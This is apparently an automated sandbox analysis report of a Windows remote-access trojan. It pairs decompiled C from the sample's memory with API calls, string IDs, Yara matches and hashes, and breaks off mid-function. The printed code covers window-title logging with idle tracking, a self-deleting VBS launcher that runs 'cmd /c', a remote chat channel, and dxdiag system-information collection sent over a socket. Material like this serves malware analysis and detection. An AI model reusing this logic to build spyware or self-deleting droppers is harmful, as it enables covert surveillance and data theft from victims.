                              									__eflags = _t134;
                              									if(__eflags == 0) {
                              										 *((char*)( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                              										 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                              										__eflags = _v5 & 0x00000048;
                              										if((_v5 & 0x00000048) == 0) {
                              											__eflags = _a16 & 0x00000008;
                              											if((_a16 & 0x00000008) != 0) {
                              												_t225 =  *_t190;
                              												_t227 = (_t225 & 0x0000003f) * 0x30;
                              												_t164 =  *((intOrPtr*)(0x46b800 + (_t225 >> 6) * 4));
                              												_t87 = _t164 + _t227 + 0x28;
                              												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                              												__eflags =  *_t87;
                              											}
                              										}
                              										_t266 = _v44;
                              										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                              										if((_t266 & 0xc0000000) != 0xc0000000) {
                              											L31:
                              											__eflags = 0;
                              											return 0;
                              										} else {
                              											__eflags = _a16 & 0x00000001;
                              											if((_a16 & 0x00000001) == 0) {
                              												goto L31;
                              											}
                              											CloseHandle(_v12);
                              											_v44 = _t266 & 0x7fffffff;
                              											_t215 = 6;
                              											_push( &_v24);
                              											_push(_a12);
                              											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                              											_t245 = E0044E24C();
                              											__eflags = _t245 - 0xffffffff;
                              											if(_t245 != 0xffffffff) {
                              												_t217 =  *_t190;
                              												_t219 = (_t217 & 0x0000003f) * 0x30;
                              												__eflags = _t219;
                              												 *((intOrPtr*)( *((intOrPtr*)(0x46b800 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                              												goto L31;
                              											}
                              											L00439DDE(GetLastError());
                              											 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                              											E00447237( *_t190);
                              											L10:
                              											goto L2;
                              										}
                              									}
                              									_t269 = _t134;
                              									goto L22;
                              								} else {
                              									_t269 = E0044E45D(_t205,  *_t190);
                              									__eflags = _t269;
                              									if(__eflags != 0) {
                              										L22:
                              										E0044419C(__eflags,  *_t190);
                              										return _t269;
                              									}
                              									goto L20;
                              								}
                              							}
                              							_t270 = GetLastError();
                              							L00439DDE(_t270);
                              							 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                              							CloseHandle(_t252);
                              							__eflags = _t270;
                              							if(_t270 == 0) {
                              								 *((intOrPtr*)(L00439E14())) = 0xd;
                              							}
                              							goto L2;
                              						}
                              						_t234 = _v44;
                              						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                              						if((_t234 & 0xc0000000) != 0xc0000000) {
                              							L9:
                              							_t235 =  *_t190;
                              							_t237 = (_t235 & 0x0000003f) * 0x30;
                              							_t180 =  *((intOrPtr*)(0x46b800 + (_t235 >> 6) * 4));
                              							_t33 = _t180 + _t237 + 0x28;
                              							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                              							__eflags =  *_t33;
                              							L00439DDE(GetLastError());
                              							goto L10;
                              						}
                              						__eflags = _a16 & 0x00000001;
                              						if((_a16 & 0x00000001) == 0) {
                              							goto L9;
                              						}
                              						_t284 = _t277 - 0x18;
                              						_v44 = _t234 & 0x7fffffff;
                              						_t239 = 6;
                              						_push( &_v24);
                              						_push(_a12);
                              						memcpy(_t284,  &_v48, _t239 << 2);
                              						_t197 = 0;
                              						_t252 = E0044E24C();
                              						_t277 = _t284 + 0x2c;
                              						_v12 = _t252;
                              						__eflags = _t252 - 0xffffffff;
                              						if(_t252 != 0xffffffff) {
                              							goto L11;
                              						}
                              						goto L9;
                              					} else {
                              						 *(L00439E01()) =  *_t186 & 0x00000000;
                              						 *_t190 = _t263;
                              						 *((intOrPtr*)(L00439E14())) = 0x18;
                              						goto L2;
                              					}
                              				} else {
                              					 *(L00439E01()) =  *_t188 & 0x00000000;
                              					 *_a8 = _t263;
                              					L2:
                              					return  *((intOrPtr*)(L00439E14()));
                              				}
                              			}

                              APIs
                                • Part of subcall function 0044E24C: CreateFileW.KERNEL32(00000000,?,?,'D,?,?,00000000,?,0044E627,00000000,0000000C), ref: 0044E269
                              • GetLastError.KERNEL32 ref: 0044E692
                              • __dosmaperr.LIBCMT ref: 0044E699
                              • GetFileType.KERNEL32(00000000), ref: 0044E6A5
                              • GetLastError.KERNEL32 ref: 0044E6AF
                              • __dosmaperr.LIBCMT ref: 0044E6B8
                              • CloseHandle.KERNEL32(00000000), ref: 0044E6D8
                              • CloseHandle.KERNEL32(?), ref: 0044E822
                              • GetLastError.KERNEL32 ref: 0044E854
                              • __dosmaperr.LIBCMT ref: 0044E85B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: H
                              • API String ID: 4237864984-2852464175
                              • Opcode ID: 83729db6a556a1019528efa5bc2c08794c0b27a863824bfcaf4dfbdb965bda8a
                              • Instruction ID: 9379966339f950b9aa3d097b32b00a291e03590e13bcb8f4c88e3fc2e04714d3
                              • Opcode Fuzzy Hash: 83729db6a556a1019528efa5bc2c08794c0b27a863824bfcaf4dfbdb965bda8a
                              • Instruction Fuzzy Hash: 8CA13732A101489FEF18EF69D8527AE7BA0EF06324F14015EF811DB391D7788D12C76A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E00409197(void* __ecx, void* __edx) {
                              				char _v28;
                              				char _v56;
                              				char _v76;
                              				char _v80;
                              				char _v100;
                              				void* _v104;
                              				char _v108;
                              				char _v112;
                              				struct HWND__* _v116;
                              				void* __ebx;
                              				void* __edi;
                              				int _t36;
                              				struct HWND__* _t42;
                              				void* _t50;
                              				int _t57;
                              				struct HWND__* _t77;
                              				void* _t119;
                              				signed int _t125;
                              				void* _t127;
                              
                              				_t112 = __edx;
                              				_t127 = (_t125 & 0xfffffff8) - 0x74;
                              				_push(_t77);
                              				_push(0xea60);
                              				_t119 = __ecx;
                              				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                              					Sleep(0x1f4);
                              					_t77 = GetForegroundWindow();
                              					_t36 = GetWindowTextLengthW(_t77);
                              					_t4 = _t36 + 1; // 0x1
                              					L00409DEE(_t77,  &_v100, _t112, _t119, _t4, 0);
                              					if(_t36 != 0) {
                              						_t57 = E00402469();
                              						GetWindowTextW(_t77, L00401ECB( &_v100), _t57);
                              						_t112 = 0x46dcf4;
                              						if(L00409EAE(0x46dcf4) == 0) {
                              							L00409DD4(0x46dcf4,  &_v100);
                              							E00407341(E00402469() - 1);
                              							_t127 = _t127 - 0x18;
                              							_t136 =  *0x46c39b;
                              							if( *0x46c39b == 0) {
                              								_t112 = L00409E6B( &_v76, L"\r\n[ ", __eflags,  &_v108);
                              								E00403086(_t77, _t127, _t67, _t119, __eflags, L" ]\r\n");
                              								L00408B82(_t119);
                              								L00401ED0();
                              							} else {
                              								E00407352(_t77, _t127, 0x46dcf4, _t136,  &_v108);
                              								E00409636(_t77, _t119, _t136);
                              							}
                              						}
                              					}
                              					_t83 = _t119;
                              					L00409C17(_t119);
                              					if(L00416B2E(_t119) < 0xea60) {
                              						L18:
                              						L00401ED0();
                              						continue;
                              					} else {
                              						_t77 = _v116;
                              						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                              							_t42 = L00416B2E(_t83);
                              							if(_t42 < 0xea60) {
                              								__eflags = _t77 % 0xea60;
                              								E0043A6FF(_t83, _t77 / 0xea60,  &_v112, 0xa);
                              								_t50 = E0040530D(_t77,  &_v80, E004075C4(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402064(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
                              								_t127 = _t127 + 0xc - 0x14;
                              								_t112 = _t50;
                              								L00416C32(_t127, _t50);
                              								L00408B82(_t119);
                              								L00401FA7();
                              								L00401FA7();
                              								L00401FA7();
                              								goto L18;
                              							}
                              							_t77 = _t42;
                              							_v116 = _t77;
                              							Sleep(0x3e8);
                              						}
                              						L00401ED0();
                              						break;
                              					}
                              				}
                              				__eflags = 0;
                              				return 0;
                              			}

                              APIs
                              • __Init_thread_footer.LIBCMT ref: 004091F9
                              • Sleep.KERNEL32(000001F4), ref: 00409204
                              • GetForegroundWindow.USER32 ref: 0040920A
                              • GetWindowTextLengthW.USER32(00000000), ref: 00409213
                              • GetWindowTextW.USER32 ref: 00409247
                              • Sleep.KERNEL32(000003E8), ref: 00409315
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                                • Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                              • String ID: [ ${ User has been idle for $ ]$ minutes }
                              • API String ID: 107669343-3343415809
                              • Opcode ID: 1e0b64def89c5051b04aa9bccde2e930d90b153b4cd63e869604e6f74576e0b0
                              • Instruction ID: d658e1a33bd020368734ed71537e8d6ac9b7a6128b86f83b49787c6d35493bb7
                              • Opcode Fuzzy Hash: 1e0b64def89c5051b04aa9bccde2e930d90b153b4cd63e869604e6f74576e0b0
                              • Instruction Fuzzy Hash: 6651D471A083415BC714FB22C846A6E7795AF84308F44053FF886A62E3EF7C9E45C68B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040B80B(void* __ebx, void* __eflags) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				char _v172;
                              				char _v196;
                              				short _v716;
                              				void* __edi;
                              				void* __ebp;
                              				void* _t36;
                              				void* _t37;
                              				void* _t40;
                              				void* _t54;
                              				void* _t67;
                              				void* _t68;
                              				void* _t79;
                              
                              				_t79 = __ebx;
                              				L0040FB4B();
                              				_t36 = E00402469();
                              				_t37 = L00401F75(0x46c560);
                              				_t40 = E00410420(L00401F75(0x46c518), "exepath",  &_v716, 0x208, _t37, _t36);
                              				_t140 = _t40;
                              				if(_t40 == 0) {
                              					GetModuleFileNameW(0,  &_v716, 0x208);
                              				}
                              				E00403086(_t79,  &_v124, L00416C32( &_v52, E004169EB( &_v76)), 0, _t140, L".vbs");
                              				L00401ED0();
                              				L00401FA7();
                              				E00404409(_t79,  &_v100, E00403086(_t79,  &_v76, E0040425F(_t79,  &_v52, E0043918F(_t79,  &_v76, _t140, L"Temp")), 0, _t140, "\\"), _t140,  &_v124);
                              				L00401ED0();
                              				L00401ED0();
                              				L00401F4D(_t79,  &_v28);
                              				_t54 = E0040425F(_t79,  &_v196, L"\"\"\", 0");
                              				E004032F1(E00403086(_t79,  &_v76, E00403010( &_v52, E00403086(_t79,  &_v148, E0040425F(_t79,  &_v172, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t140,  &_v716), _t54), 0, _t140, "\n"));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				E0040766E(_t79,  &_v28, 0, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                              				_t67 = L00401ECB( &_v100);
                              				_t68 = E00402469();
                              				if(E0041729F(L00401ECB( &_v28), _t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v100), 0x45f714, 0x45f714, 0) > 0x20) {
                              					ExitProcess(0);
                              				}
                              				L00401ED0();
                              				L00401ED0();
                              				return L00401ED0();
                              			}

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E
                                • Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
                                • Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
                                • Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B865
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B9C4
                              • ExitProcess.KERNEL32 ref: 0040B9D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                              • API String ID: 1913171305-2411266221
                              • Opcode ID: 998cdbba718eadb24a103a7e37909eb3fb99a79c7a6643fa32b985e9ab2342a0
                              • Instruction ID: e165f019403b777232d5c6ec79ea45895c0ef20fb9be7ec1ee46aed41850c1d8
                              • Opcode Fuzzy Hash: 998cdbba718eadb24a103a7e37909eb3fb99a79c7a6643fa32b985e9ab2342a0
                              • Instruction Fuzzy Hash: 67418F319100185ACB14FB62DC96DEE7739AF50744F10017FF406B20E2EF385E8ACA99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044FEEF), ref: 0044F307
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: DecodePointer
                              • String ID: acos$asin$exp$log$log10$pow$sqrt$@
                              • API String ID: 3527080286-3098891844
                              • Opcode ID: 2dadbbac7597865ff50da2a3c3a534bf5187b14ce0e3ba92897013525b7cc476
                              • Instruction ID: c22834c9641bea404e8976183de0de3b5e68054bdcba2795ef1ced98d83d77b1
                              • Opcode Fuzzy Hash: 2dadbbac7597865ff50da2a3c3a534bf5187b14ce0e3ba92897013525b7cc476
                              • Instruction Fuzzy Hash: A4518F71900609CBEF10DF98E9484AEBBB0FB59305F6041A7D841A7355CB798E2DCB2E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 73%
                              			E004053B7(char* __edx, void* __eflags, intOrPtr _a4) {
                              				struct tagMSG _v52;
                              				void* _v56;
                              				char _v60;
                              				char _v76;
                              				char _v80;
                              				char _v84;
                              				char _v104;
                              				char _v108;
                              				void* _v112;
                              				char _v116;
                              				char _v140;
                              				void* _v176;
                              				void* __ebx;
                              				void* __ebp;
                              				intOrPtr* _t27;
                              				intOrPtr _t42;
                              				intOrPtr _t43;
                              				void* _t54;
                              				void* _t65;
                              				void* _t66;
                              				void* _t68;
                              				intOrPtr _t102;
                              				void* _t106;
                              				struct HWND__* _t109;
                              				signed int _t110;
                              				void* _t113;
                              				void* _t114;
                              				void* _t115;
                              				void* _t116;
                              
                              				_t118 = __eflags;
                              				_t97 = __edx;
                              				_push(_t65);
                              				_t102 = _a4;
                              				E004020CC(_t65,  &_v104, __edx, __eflags, _t102 + 0x1c);
                              				SetEvent( *(_t102 + 0x34));
                              				_t27 = L00401F75( &_v108);
                              				E00404286( &_v108,  &_v60, 4, 0xffffffff);
                              				_t113 = (_t110 & 0xfffffff8) - 0x5c;
                              				E004020CC(_t65, _t113, _t97, _t118, 0x46c238);
                              				_t114 = _t113 - 0x18;
                              				E004020CC(_t65, _t114, _t97, _t118,  &_v76);
                              				L00416DD0( &_v140, _t97);
                              				_t115 = _t114 + 0x30;
                              				_t106 =  *_t27 - 0x3a;
                              				if(_t106 == 0) {
                              					_t66 = E0040A15B(L00401F75(L00401E29( &_v116, _t97, __eflags, 0)));
                              					__eflags = _t66;
                              					if(_t66 == 0) {
                              						L7:
                              						L00401E54( &_v116, _t97);
                              						L00401FA7();
                              						L00401FA7();
                              						__eflags = 0;
                              						return 0;
                              					}
                              					 *0x46baec = E0040A1B1(_t66, "DisplayMessage");
                              					_t42 = E0040A1B1(_t66, "GetMessage");
                              					_t100 = "CloseChat";
                              					 *0x46bae4 = _t42;
                              					_t43 = E0040A1B1(_t66, "CloseChat");
                              					_t116 = _t115 - 0x18;
                              					 *0x46bae8 = _t43;
                              					 *0x46bae1 = 1;
                              					E004020CC(_t66, _t116, "CloseChat", __eflags, 0x46c2b8);
                              					_push(0x74);
                              					L00404A6E(_t66, _t102, _t100, __eflags);
                              					L10:
                              					_t68 = HeapCreate(0, 0, 0);
                              					__eflags =  *0x46bae4(_t68,  &_v140);
                              					if(__eflags != 0) {
                              						_t116 = _t116 - 0x18;
                              						E0040208B(_t68, _t116, _t100, __eflags, _v140, _t48);
                              						_push(0x3b);
                              						L00404A6E(_t68, _t102, _t100, __eflags);
                              						HeapFree(_t68, 0, _v176);
                              					}
                              					goto L10;
                              				}
                              				_t109 = _t106 - 1;
                              				_t120 = _t109;
                              				if(_t109 != 0) {
                              					goto L7;
                              				}
                              				_t54 =  *0x46baec(L00401F75(L00401E29( &_v116, _t97, _t120, _t109)));
                              				_t121 = _t54;
                              				if(_t54 == 0) {
                              					goto L7;
                              				}
                              				E0040425F(_t65,  &_v80, 0x45f6a8);
                              				_t97 =  &_v84;
                              				L00416CF4(_t65, _t115 - 0x18,  &_v84);
                              				_push(0x3b);
                              				L00404A6E(_t65, _t102,  &_v84, _t121);
                              				L00401ED0();
                              				L4:
                              				while(GetMessageA( &_v52, _t109, _t109, _t109) > 0) {
                              					TranslateMessage( &_v52);
                              					DispatchMessageA( &_v52);
                              				}
                              				if(__eflags < 0) {
                              					goto L4;
                              				}
                              				goto L7;
                              			}
                              0x004053b7
                              0x004053b7
                              0x004053c4
                              0x004053c7
                              0x004053ce
                              0x004053d6
                              0x004053e0
                              0x004053f4
                              0x004053f9
                              0x00405403
                              0x00405408
                              0x00405412
                              0x0040541b
                              0x00405420
                              0x00405423
                              0x00405426
                              0x004054e6
                              0x004054e8
                              0x004054ea
                              0x004054a8
                              0x004054ac
                              0x004054b5
                              0x004054be
                              0x004054c5
                              0x004054cb
                              0x004054cb
                              0x004054fd
                              0x00405504
                              0x00405509
                              0x0040550e
                              0x00405515
                              0x0040551a
                              0x0040551d
                              0x00405524
                              0x00405530
                              0x00405535
                              0x00405539
                              0x0040553e
                              0x00405547
                              0x00405557
                              0x00405559
                              0x0040555b
                              0x00405565
                              0x0040556a
                              0x0040556e
                              0x00405579
                              0x00405579
                              0x00000000
                              0x00405559
                              0x0040542c
                              0x0040542c
                              0x0040542f
                              0x00000000
                              0x00000000
                              0x00405443
                              0x0040544a
                              0x0040544c
                              0x00000000
                              0x00000000
                              0x00405457
                              0x0040545f
                              0x00405465
                              0x0040546a
                              0x0040546e
                              0x00405477
                              0x00000000
                              0x0040547c
                              0x00405493
                              0x0040549e
                              0x0040549e
                              0x004054a6
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              • SetEvent.KERNEL32(?,?), ref: 004053D6
                              • GetMessageA.USER32 ref: 00405484
                              • TranslateMessage.USER32(?), ref: 00405493
                              • DispatchMessageA.USER32 ref: 0040549E
                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 00405541
                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405579
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                              • String ID: CloseChat$DisplayMessage$GetMessage
                              • API String ID: 2956720200-749203953
                              • Opcode ID: 02051dfd2f121262e23d97fa20897eb118d393fedf734998bddfa0f823dbe46e
                              • Instruction ID: 40e2d3d5fc2c9ffc40a8a8c2273da8ce5b9fbac120eee0586a17121859013f1e
                              • Opcode Fuzzy Hash: 02051dfd2f121262e23d97fa20897eb118d393fedf734998bddfa0f823dbe46e
                              • Instruction Fuzzy Hash: E8419371604301ABC600BB75DD5A9AF7BA9EF81315F40053FF505A31E2EF389909CB9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E004179B3(void* __ecx, void* __edx, intOrPtr _a4) {
                              				char _v524;
                              				char _v544;
                              				char _v560;
                              				char _v572;
                              				void* _v576;
                              				char _v580;
                              				char _v584;
                              				char _v600;
                              				char _v608;
                              				char _v616;
                              				char _v620;
                              				void* _v624;
                              				char _v628;
                              				char _v632;
                              				char _v636;
                              				char _v644;
                              				void* _v648;
                              				char _v652;
                              				void* _v672;
                              				void* __ebx;
                              				signed int _t36;
                              				void* _t39;
                              				void* _t40;
                              				void* _t77;
                              
                              				_t73 = __edx;
                              				_t77 = __ecx;
                              				_t54 = __edx;
                              				L00401F4D(__edx,  &_v644);
                              				_t36 = __edx + 0xffffffd0;
                              				_t85 = _t36 - 7;
                              				if(_t36 <= 7) {
                              					switch( *((intOrPtr*)(_t36 * 4 +  &M00417B8F))) {
                              						case 0:
                              							_push(L"Temp");
                              							goto L14;
                              						case 1:
                              							__ecx =  &_v620;
                              							__eax = E0041669D(__ebx,  &_v620);
                              							__ecx =  &_v644;
                              							__eax = L00401EDA( &_v644, __edx, __esi, __eax);
                              							goto L4;
                              						case 2:
                              							_push(L"SystemDrive");
                              							goto L14;
                              						case 3:
                              							_push(L"WinDir");
                              							goto L14;
                              						case 4:
                              							__eax = L00416F6C(__ecx);
                              							__eflags = __al;
                              							if(__eflags != 0) {
                              								__ecx =  &_v620;
                              								E0040425F(__ebx, __ecx, L"\\SysWOW64") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
                              								__ecx =  &_v600;
                              								__edx = __eax;
                              								__ecx =  &_v580;
                              								__eax = E00403010( &_v580, __edx, __eax);
                              								__ecx =  &_v652;
                              								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
                              								__ecx =  &_v584;
                              								__eax = L00401ED0();
                              								__ecx =  &_v608;
                              								__eax = L00401ED0();
                              								L4:
                              								__ecx =  &_v620;
                              								goto L5;
                              							} else {
                              								__ecx =  &_v572;
                              								E0040425F(__ebx, __ecx, L"\\system32") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
                              								__ecx =  &_v600;
                              								__edx = __eax;
                              								__ecx =  &_v628;
                              								__eax = E00403010( &_v628, __edx, __eax);
                              								__ecx =  &_v652;
                              								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
                              								__ecx =  &_v632;
                              								__eax = L00401ED0();
                              								__ecx =  &_v608;
                              								__eax = L00401ED0();
                              								__ecx =  &_v584;
                              								L5:
                              								__eax = L00401ED0();
                              								goto L15;
                              							}
                              							L16:
                              						case 5:
                              							_push(L"ProgramFiles");
                              							goto L14;
                              						case 6:
                              							_push(L"AppData");
                              							goto L14;
                              						case 7:
                              							_push(L"UserProfile");
                              							L14:
                              							L00409DCB(_t54,  &_v644, E0043918F(_t54, _t57, _t85));
                              							goto L15;
                              					}
                              				}
                              				L15:
                              				__imp__GetLongPathNameW(L00401ECB( &_v644),  &_v524, 0x208);
                              				_t39 = E0040425F(_t54,  &_v560, _a4);
                              				_t40 = E0040425F(_t54,  &_v636, "\\");
                              				E00403010(_t77, E00403010( &_v600, L00417D4C(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				return _t77;
                              				goto L16;
                              			}
                              0x004179b3
                              0x004179c2
                              0x004179c4
                              0x004179ca
                              0x004179d2
                              0x004179d5
                              0x004179d8
                              0x004179de
                              0x00000000
                              0x004179e5
                              0x00000000
                              0x00000000
                              0x004179ef
                              0x004179f3
                              0x004179f9
                              0x004179fd
                              0x00000000
                              0x00000000
                              0x00417a10
                              0x00000000
                              0x00000000
                              0x00417a1a
                              0x00000000
                              0x00000000
                              0x00417a24
                              0x00417a29
                              0x00417a2b
                              0x00417a84
                              0x00417a93
                              0x00417a9a
                              0x00417aa3
                              0x00417aa5
                              0x00417aa9
                              0x00417ab0
                              0x00417ab4
                              0x00417ab9
                              0x00417abd
                              0x00417ac2
                              0x00417ac6
                              0x00417a02
                              0x00417a02
                              0x00000000
                              0x00417a2d
                              0x00417a32
                              0x00417a41
                              0x00417a48
                              0x00417a51
                              0x00417a53
                              0x00417a57
                              0x00417a5e
                              0x00417a62
                              0x00417a67
                              0x00417a6b
                              0x00417a70
                              0x00417a74
                              0x00417a79
                              0x00417a06
                              0x00417a06
                              0x00000000
                              0x00417a06
                              0x00000000
                              0x00000000
                              0x00417ad0
                              0x00000000
                              0x00000000
                              0x00417ad7
                              0x00000000
                              0x00000000
                              0x00417ade
                              0x00417ae3
                              0x00417aee
                              0x00000000
                              0x00000000
                              0x004179de
                              0x00417af3
                              0x00417b0a
                              0x00417b19
                              0x00417b28
                              0x00417b50
                              0x00417b5a
                              0x00417b63
                              0x00417b6c
                              0x00417b75
                              0x00417b7e
                              0x00417b8b
                              0x00000000

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 82841172-1609423294
                              • Opcode ID: d9419fcc739b8a316a348d5f7169f2ad597bef89d8b132f4787c0214b612faa3
                              • Instruction ID: 6472f6f80a3df67a90006e08033efa2a9a0bfe3ce3822e9bff2fa4fccbff765a
                              • Opcode Fuzzy Hash: d9419fcc739b8a316a348d5f7169f2ad597bef89d8b132f4787c0214b612faa3
                              • Instruction Fuzzy Hash: 224126711082005AC314FB62DC52DEFB3A9AE90798F10093FF556620E2EE789F49C69B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00413012(void* __ecx, void* __eflags, char _a4) {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v180;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t35;
                              				void* _t46;
                              				void* _t54;
                              				void* _t55;
                              				void* _t90;
                              				void* _t92;
                              				void* _t94;
                              				void* _t95;
                              
                              				_t97 = __eflags;
                              				E00403086(_t54,  &_v76, E0040425F(_t54,  &_v52, E0043918F(_t54, __ecx, __eflags, L"temp")), _t90, _t97, L"\\sysinfo.txt");
                              				L00401ED0();
                              				_t55 = 0;
                              				ShellExecuteW(0, L"open", L"dxdiag", L00401ECB(L00409E6B( &_v52, L"/t ", 0,  &_v76)), 0, 0);
                              				L00401ED0();
                              				E004020B5(0,  &_v28);
                              				_t92 = 0;
                              				do {
                              					_t35 = L00401ECB( &_v76);
                              					_t87 =  &_v28;
                              					E00417334(_t35,  &_v28);
                              					Sleep(0x64);
                              					_t92 = _t92 + 1;
                              				} while (L00409DB7() != 0 && _t92 < 0x4b0);
                              				if(L00409DB7() == 0) {
                              					DeleteFileW(L00401ECB( &_v76));
                              					E00404818(_t55,  &_v180, 1);
                              					_t95 = _t94 - 0x10;
                              					_t93 = 0x46bacc;
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					_t46 = E004049D2(_t87);
                              					_t102 = _t46;
                              					if(_t46 != 0) {
                              						_t93 = _t95 - 0x18;
                              						_t16 =  &_a4; // 0x412c62
                              						L00402F73(_t55, _t95 - 0x18, L00402F97( &_v52, _t16, 0x46c238), _t102,  &_v28);
                              						_push(0x97);
                              						L00404A6E(_t55,  &_v180, _t49, _t102);
                              						L00401FA7();
                              						L00404DD5( &_v180);
                              						_t55 = 1;
                              					}
                              					L00404DF9(_t55,  &_v180, _t93);
                              				}
                              				L00401FA7();
                              				L00401ED0();
                              				L00401FA7();
                              				return _t55;
                              			}
                              0x00413012
                              0x0041303c
                              0x00413045
                              0x0041304a
